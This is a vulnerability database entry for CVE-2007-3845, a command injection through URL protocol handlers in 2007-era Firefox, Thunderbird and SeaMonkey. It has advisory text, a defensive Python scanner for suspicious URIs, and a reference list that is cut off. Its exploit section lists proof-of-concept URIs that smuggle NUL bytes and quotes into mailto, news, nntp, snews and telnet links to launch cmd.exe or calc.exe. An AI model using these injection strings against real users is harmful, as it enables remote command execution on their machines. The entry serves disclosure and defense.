Mozilla Firefox/Thunderbird/SeaMonkey URL Handler Remote Command Injection Vulnerability

Vulnerability ID: 1113366    Vulnerability type: Input validation
Published: 2007-07-25    Updated: 2007-09-13
CVE ID: CVE-2007-3845    CNNVD-ID: CNNVD-200708-064
Platform: Windows    CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/30381
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-064
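|Vulnerability details
Firefox is a very popular open-source web browser. Mozilla Firefox before 2.0.0.6, Thunderbird before 1.5.0.13 and 2.x to 2.0.0.6, and SeaMonkey before 1.1.4 have a command injection vulnerability when handling URL strings that contain certain characters; a remote attacker may exploit it to execute arbitrary commands on the user's system. Firefox does not filter the data passed to certain URIs. If a URL containing the "%00" character is passed to a protocol such as http, https, ftp, gopher, telnet, mailto, news, snews or nntp, the FileType handler is invoked according to the extension of the full URL instead of the URL protocol handler, and the URL is then passed to that file handler. A remote attacker can exploit this vulnerability by creating a malicious URI link; if a user is tricked into following the link, Firefox passes the URI to the registered URI handler, resulting in the injection and execution of arbitrary commands. The vulnerability also affects other browsers such as IE, and applications such as Skype and Acrobat Reader.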
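A defender-side check for the condition described above, as an added example that is not part of the original record or of any vendor's code: it flags links whose scheme is in the advisory's list and whose decoded form contains a NUL, and reports the trailing extension that would then select the FileType handler. The names `inspect_uri` and `scan`, the sample links, and the extra double-quote heuristic are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Schemes the advisory text lists as affected (added example, not vendor code).
EXTERNAL_SCHEMES = {"http", "https", "ftp", "gopher", "telnet",
                    "mailto", "news", "snews", "nntp"}
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
EXT_RE = re.compile(r"\.([A-Za-z0-9]{1,8})$")


def inspect_uri(uri):
    """Return findings for one URI; an empty list means nothing was flagged."""
    uri = uri.strip()
    m = SCHEME_RE.match(uri)
    if not m or m.group(1).lower() not in EXTERNAL_SCHEMES:
        return []
    decoded = unquote(uri[m.end():])  # "%00" becomes a real NUL character
    findings = []
    if "\x00" in decoded:
        # Per the advisory, the extension of the full URL then selects the
        # FileType handler, so report it alongside the NUL finding.
        ext = EXT_RE.search(decoded)
        findings.append("nul-byte" + (f" ext=.{ext.group(1).lower()}" if ext else ""))
    if '"' in decoded:
        # Assumption: a quote in the decoded URI can break handler argument quoting.
        findings.append("double-quote")
    return findings


def scan(uris):
    """Map each flagged URI to its findings, skipping clean ones."""
    return {u: f for u in uris if (f := inspect_uri(u))}


# Constructed sample links (not taken from any real log or message).
SAMPLES = [
    "mailto:alice@example.com",
    "mailto:%00alice@example.com/notes.bat",
    "news:example.group%20%22%20x.bat",
    "https://example.com/a%00b.cmd",
    "javascript:%00",
]

if __name__ == "__main__":
    for uri, findings in scan(SAMPLES).items():
        print(uri, "->", ", ".join(findings))
```

The same function can be run over links extracted from mail bodies or proxy logs before they reach a client that hands URIs to external handlers.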
|Vulnerability exploit (EXP)
source: http://www.securityfocus.com/bid/25053/info

Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers.

An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.

Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.

Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected. 

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat

news:windows/system32/calc.exe%20"%20-%20"%20blah.bat

snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l

news:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1

nntp:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1

snews:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1

mailto:// C:\lotus\notes\notes.exe /defini %1
|References

Source: BUGTRAQ
Name: 20070803FLEA-2007-0040-1thunderbird
Link: http://www.securityfocus.com/archive/1/archive/1/475450/30/5550/threaded
Source: www.mozilla.org
Link: http://www.mozilla.org/security/announce/2007/mfsa2007-27.html
Source: bugzilla.mozilla.org
Link: http://bugzilla.mozilla.org/show_bug.cgi?id=389580
Source: issues.rpath.com
Link: https://issues.rpath.com/browse/RPL-1600
Source: bugzilla.mozilla.org
Link: https://bugzilla.mozilla.org/show_bug.cgi?id=389106
Source: UBUNTU
Name: USN-503-1
Link: http://www.ubuntu.com/usn/usn-503-1
Source: UBUNTU
Name: USN-493-1
Link: http://www.ubuntu.com/usn/usn-493-1
Source: BID
Name: 25053
Link: http://www.securityfocus.com/bid/25053
Source: BUGTRAQ
Name: 20070801FLEA-2007-0039-1firefox
Link: http://www.securityfocus.com/archive/1/archive/1/475265/100/200/threaded
Source: MANDRIVA
Name: MDVSA-2008:047
Link: http://www.mandriva.com/security/advisories?name=MDVSA-2008:047
Source: MANDRIVA
Name: MDVSA-2007:047
Link: http://www.mandriva.com/security/advisories?name=MDVSA-2007:047
Source: MANDRIVA
Name: MDKSA-2007:152
Link: http://www.mandriva.com/security/adv